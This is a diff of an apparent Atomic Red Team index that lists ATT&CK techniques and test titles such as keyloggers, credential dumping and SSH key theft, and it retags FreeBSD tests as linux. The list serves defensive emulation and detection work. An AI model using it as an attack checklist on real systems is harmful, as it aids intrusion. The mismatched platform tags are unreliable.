- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
|
||||
- Atomic Test #1: Connection Proxy [linux, macos]
|
||||
- Atomic Test #2: Connection Proxy for macOS UI [macos]
|
||||
- Atomic Test #3: portproxy reg key [windows]
|
||||
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1855,17 +1855,17 @@
|
||||
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
|
||||
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
|
||||
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
|
||||
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
|
||||
- [T1113 Screen Capture](../../T1113/T1113.md)
|
||||
- Atomic Test #1: Screencapture [macos]
|
||||
- Atomic Test #2: Screencapture (silent) [macos]
|
||||
- Atomic Test #3: X Windows Capture [linux]
|
||||
- Atomic Test #4: X Windows Capture (freebsd) [freebsd]
|
||||
- Atomic Test #4: X Windows Capture (freebsd) [linux]
|
||||
- Atomic Test #5: Capture Linux Desktop using Import Tool [linux]
|
||||
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [freebsd]
|
||||
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux]
|
||||
- Atomic Test #7: Windows Screencapture [windows]
|
||||
- Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
|
||||
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1873,8 +1873,8 @@
|
||||
- Atomic Test #1: Input Capture [windows]
|
||||
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
|
||||
- Atomic Test #3: Logging bash history to syslog [linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [freebsd]
|
||||
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [linux]
|
||||
- Atomic Test #6: SSHD PAM keylogger [linux]
|
||||
- Atomic Test #7: Auditd keylogger [linux]
|
||||
- Atomic Test #8: MacOS Swift Keylogger [macos]
|
||||
@@ -1890,7 +1890,7 @@
|
||||
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
|
||||
- Atomic Test #1: Stage data from Discovery.bat [windows]
|
||||
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
|
||||
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [freebsd]
|
||||
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
|
||||
- Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows]
|
||||
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
|
||||
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
|
||||
@@ -1913,10 +1913,10 @@
|
||||
- [T1005 Data from Local System](../../T1005/T1005.md)
|
||||
- Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows]
|
||||
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
|
||||
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
|
||||
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1560 Archive Collected Data](../../T1560/T1560.md)
|
||||
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
|
||||
@@ -2010,14 +2010,14 @@
|
||||
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
|
||||
- Atomic Test #1: Input Capture [windows]
|
||||
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
|
||||
- Atomic Test #3: Logging bash history to syslog [linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [freebsd]
|
||||
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [linux]
|
||||
- Atomic Test #6: SSHD PAM keylogger [linux]
|
||||
- Atomic Test #7: Auditd keylogger [linux]
|
||||
- Atomic Test #8: MacOS Swift Keylogger [macos]
|
||||
@@ -2028,7 +2028,7 @@
|
||||
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
|
||||
- Atomic Test #5: SUDO Brute Force - Debian [linux]
|
||||
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
|
||||
- Atomic Test #7: SUDO Brute Force - FreeBSD [freebsd]
|
||||
- Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
|
||||
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
|
||||
- Atomic Test #1: Gsecdump [windows]
|
||||
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
|
||||
@@ -2066,13 +2066,13 @@
|
||||
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
|
||||
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
|
||||
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [freebsd]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux]
|
||||
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [linux]
|
||||
- Atomic Test #4: Capture Passwords with MimiPenguin [linux]
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #5: Windows Internal Packet Capture [windows]
|
||||
@@ -2080,8 +2080,8 @@
|
||||
- Atomic Test #7: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
|
||||
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
|
||||
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
|
||||
@@ -2131,13 +2131,13 @@
|
||||
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
|
||||
- Atomic Test #1: Private Keys [windows]
|
||||
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
|
||||
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
|
||||
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
|
||||
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [freebsd]
|
||||
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux]
|
||||
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
|
||||
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [freebsd]
|
||||
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
|
||||
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
|
||||
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [freebsd]
|
||||
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
|
||||
- Atomic Test #9: ADFS token signing and encryption certificates theft - Local [windows]
|
||||
- Atomic Test #10: ADFS token signing and encryption certificates theft - Remote [windows]
|
||||
- Atomic Test #11: CertUtil ExportPFX [windows]
|
||||
@@ -2181,14 +2181,14 @@
|
||||
- Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- Atomic Test #2: Search Through sh History [freebsd]
|
||||
- Atomic Test #2: Search Through sh History [linux]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [linux, macos]
|
||||
- Atomic Test #4: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #5: Access unattend.xml [windows]
|
||||
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
|
||||
- Atomic Test #7: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #8: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #9: WinPwn - powershellsensitive [windows]
|
||||
@@ -2216,7 +2216,7 @@
|
||||
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
|
||||
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
|
||||
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
|
||||
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [freebsd]
|
||||
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
|
||||
- Atomic Test #4: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
|
||||
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -2229,10 +2229,10 @@
|
||||
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
|
||||
- Atomic Test #1: Access /etc/shadow (Local) [linux]
|
||||
- Atomic Test #2: Access /etc/master.passwd (Local) [freebsd]
|
||||
- Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux]
|
||||
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux]
|
||||
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux]
|
||||
- Atomic Test #2: Access /etc/master.passwd (Local) [linux]
|
||||
- Atomic Test #3: Access /etc/passwd (Local) [linux]
|
||||
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
|
||||
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
|
||||
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
|
||||
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
|
||||
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
|
||||
@@ -2273,7 +2273,7 @@
|
||||
# discovery
|
||||
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
|
||||
- Atomic Test #1: System Owner/User Discovery [windows]
|
||||
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #2: System Owner/User Discovery [linux, macos]
|
||||
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
|
||||
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
|
||||
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
|
||||
@@ -2316,20 +2316,20 @@
|
||||
- Atomic Test #23: Active Directory Domain Search [linux]
|
||||
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
|
||||
- Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux]
|
||||
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
|
||||
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
|
||||
- Atomic Test #1: Enumerate all accounts (Local) [linux]
|
||||
- Atomic Test #2: View sudoers access [linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [linux, macos]
|
||||
- Atomic Test #4: List opened files by user [linux, macos]
|
||||
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
|
||||
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [freebsd]
|
||||
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
|
||||
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
|
||||
- Atomic Test #7: Enumerate users and groups [linux, macos]
|
||||
- Atomic Test #8: Enumerate users and groups [macos]
|
||||
- Atomic Test #9: Enumerate all accounts on Windows (Local) [windows]
|
||||
- Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows]
|
||||
- Atomic Test #11: Enumerate logged on users via CMD (Local) [windows]
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
|
||||
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
|
||||
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
|
||||
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
|
||||
@@ -2353,10 +2353,10 @@
|
||||
- Atomic Test #1: System Service Discovery [windows]
|
||||
- Atomic Test #2: System Service Discovery - net.exe [windows]
|
||||
- Atomic Test #3: System Service Discovery - systemctl [linux]
|
||||
- Atomic Test #4: System Service Discovery - service [freebsd]
|
||||
- Atomic Test #4: System Service Discovery - service [linux]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #5: Windows Internal Packet Capture [windows]
|
||||
@@ -2364,8 +2364,8 @@
|
||||
- Atomic Test #7: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
|
||||
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
|
||||
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
|
||||
@@ -2373,7 +2373,7 @@
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #1: Network Share Discovery [macos]
|
||||
- Atomic Test #2: Network Share Discovery - linux [linux]
|
||||
- Atomic Test #3: Network Share Discovery - FreeBSD [freebsd]
|
||||
- Atomic Test #3: Network Share Discovery - FreeBSD [linux]
|
||||
- Atomic Test #4: Network Share Discovery command prompt [windows]
|
||||
- Atomic Test #5: Network Share Discovery PowerShell [windows]
|
||||
- Atomic Test #6: View available share drives [windows]
|
||||
@@ -2387,16 +2387,16 @@
|
||||
- [T1082 System Information Discovery](../../T1082/T1082.md)
|
||||
- Atomic Test #1: System Information Discovery [windows]
|
||||
- Atomic Test #2: System Information Discovery [macos]
|
||||
- Atomic Test #3: List OS Information [freebsd, linux, macos]
|
||||
- Atomic Test #3: List OS Information [linux, macos]
|
||||
- Atomic Test #4: Linux VM Check via Hardware [linux]
|
||||
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
|
||||
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [freebsd]
|
||||
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux]
|
||||
- Atomic Test #7: Hostname Discovery (Windows) [windows]
|
||||
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #8: Hostname Discovery [linux, macos]
|
||||
- Atomic Test #9: Windows MachineGUID Discovery [windows]
|
||||
- Atomic Test #10: Griffon Recon [windows]
|
||||
- Atomic Test #11: Environment variables discovery on windows [windows]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
|
||||
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
|
||||
- Atomic Test #14: WinPwn - winPEAS [windows]
|
||||
- Atomic Test #15: WinPwn - itm4nprivesc [windows]
|
||||
@@ -2410,7 +2410,7 @@
|
||||
- Atomic Test #23: WinPwn - PowerSharpPack - Seatbelt [windows]
|
||||
- Atomic Test #24: Azure Security Scan with SkyArk [azure-ad]
|
||||
- Atomic Test #25: Linux List Kernel Modules [linux]
|
||||
- Atomic Test #26: FreeBSD List Kernel Modules [freebsd]
|
||||
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
|
||||
- Atomic Test #27: System Information Discovery with WMIC [windows]
|
||||
- Atomic Test #28: Driver Enumeration using DriverQuery [windows]
|
||||
- Atomic Test #29: System Information Discovery [windows]
|
||||
@@ -2423,10 +2423,10 @@
|
||||
- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
|
||||
- Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws]
|
||||
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
|
||||
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux]
|
||||
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
|
||||
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
|
||||
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [freebsd]
|
||||
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux]
|
||||
- Atomic Test #5: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
|
||||
- Atomic Test #6: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
|
||||
- Atomic Test #7: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
|
||||
@@ -2436,7 +2436,7 @@
|
||||
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
|
||||
- Atomic Test #2: List Windows Firewall Rules [windows]
|
||||
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
|
||||
- Atomic Test #4: System Network Configuration Discovery (freebsd) [freebsd]
|
||||
- Atomic Test #4: System Network Configuration Discovery (freebsd) [linux]
|
||||
- Atomic Test #5: System Network Configuration Discovery (TrickBot Style) [windows]
|
||||
- Atomic Test #6: List Open Egress Ports [windows]
|
||||
- Atomic Test #7: Adfind - Enumerate Active Directory Subnet Objects [windows]
|
||||
@@ -2456,21 +2456,21 @@
|
||||
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
|
||||
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
|
||||
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
|
||||
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
|
||||
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
|
||||
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
|
||||
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
|
||||
- Atomic Test #6: Launch DirLister Executable [windows]
|
||||
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
|
||||
- Atomic Test #1: System Network Connections Discovery [windows]
|
||||
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
|
||||
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
|
||||
- Atomic Test #4: System Discovery using SharpView [windows]
|
||||
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
|
||||
- Atomic Test #1: AWS S3 Enumeration [iaas:aws]
|
||||
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1057 Process Discovery](../../T1057/T1057.md)
|
||||
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
|
||||
- Atomic Test #1: Process Discovery - ps [linux, macos]
|
||||
- Atomic Test #2: Process Discovery - tasklist [windows]
|
||||
- Atomic Test #3: Process Discovery - Get-Process [windows]
|
||||
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
|
||||
@@ -2478,7 +2478,7 @@
|
||||
- Atomic Test #6: Discover Specific Process - tasklist [windows]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
|
||||
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
|
||||
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
|
||||
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
|
||||
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
|
||||
@@ -2487,7 +2487,7 @@
|
||||
- Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
|
||||
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
|
||||
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
|
||||
- Atomic Test #2: Examine password complexity policy - FreeBSD [freebsd]
|
||||
- Atomic Test #2: Examine password complexity policy - FreeBSD [linux]
|
||||
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux]
|
||||
- Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux]
|
||||
- Atomic Test #5: Examine password expiration policy - All Linux [linux]
|
||||
@@ -2501,10 +2501,10 @@
|
||||
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
|
||||
- Atomic Test #1: Discover System Language by Registry Query [windows]
|
||||
- Atomic Test #2: Discover System Language with chcp [windows]
|
||||
- Atomic Test #3: Discover System Language with locale [freebsd, linux]
|
||||
- Atomic Test #3: Discover System Language with locale [linux]
|
||||
- Atomic Test #4: Discover System Language with localectl [linux]
|
||||
- Atomic Test #5: Discover System Language by locale file [linux]
|
||||
- Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux]
|
||||
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
|
||||
- [T1012 Query Registry](../../T1012/T1012.md)
|
||||
- Atomic Test #1: Query Registry [windows]
|
||||
- Atomic Test #2: Query Registry with Powershell cmdlets [windows]
|
||||
@@ -2515,7 +2515,7 @@
|
||||
- Atomic Test #2: Security Software Discovery - powershell [windows]
|
||||
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
|
||||
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
|
||||
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [freebsd]
|
||||
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux]
|
||||
- Atomic Test #6: Security Software Discovery - Sysmon Service [windows]
|
||||
- Atomic Test #7: Security Software Discovery - AV Discovery via WMI [windows]
|
||||
- Atomic Test #8: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets [windows]
|
||||
@@ -2529,15 +2529,15 @@
|
||||
- Atomic Test #3: Remote System Discovery - nltest [windows]
|
||||
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
|
||||
- Atomic Test #5: Remote System Discovery - arp [windows]
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- Atomic Test #8: Remote System Discovery - nslookup [windows]
|
||||
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
|
||||
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
|
||||
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
|
||||
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
|
||||
- Atomic Test #13: Remote System Discovery - ip route [linux]
|
||||
- Atomic Test #14: Remote System Discovery - netstat [freebsd]
|
||||
- Atomic Test #14: Remote System Discovery - netstat [linux]
|
||||
- Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux]
|
||||
- Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
|
||||
- Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer [windows]
|
||||
@@ -2548,7 +2548,7 @@
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- Atomic Test #3: Port Scan Nmap for FreeBSD [freebsd]
|
||||
- Atomic Test #3: Port Scan Nmap for FreeBSD [linux]
|
||||
- Atomic Test #4: Port Scan NMap for Windows [windows]
|
||||
- Atomic Test #5: Port Scan using python [windows]
|
||||
- Atomic Test #6: WinPwn - spoolvulnscan [windows]
|
||||
@@ -2569,7 +2569,7 @@
|
||||
- [T1124 System Time Discovery](../../T1124/T1124.md)
|
||||
- Atomic Test #1: System Time Discovery [windows]
|
||||
- Atomic Test #2: System Time Discovery - PowerShell [windows]
|
||||
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [freebsd, macos]
|
||||
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
|
||||
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
|
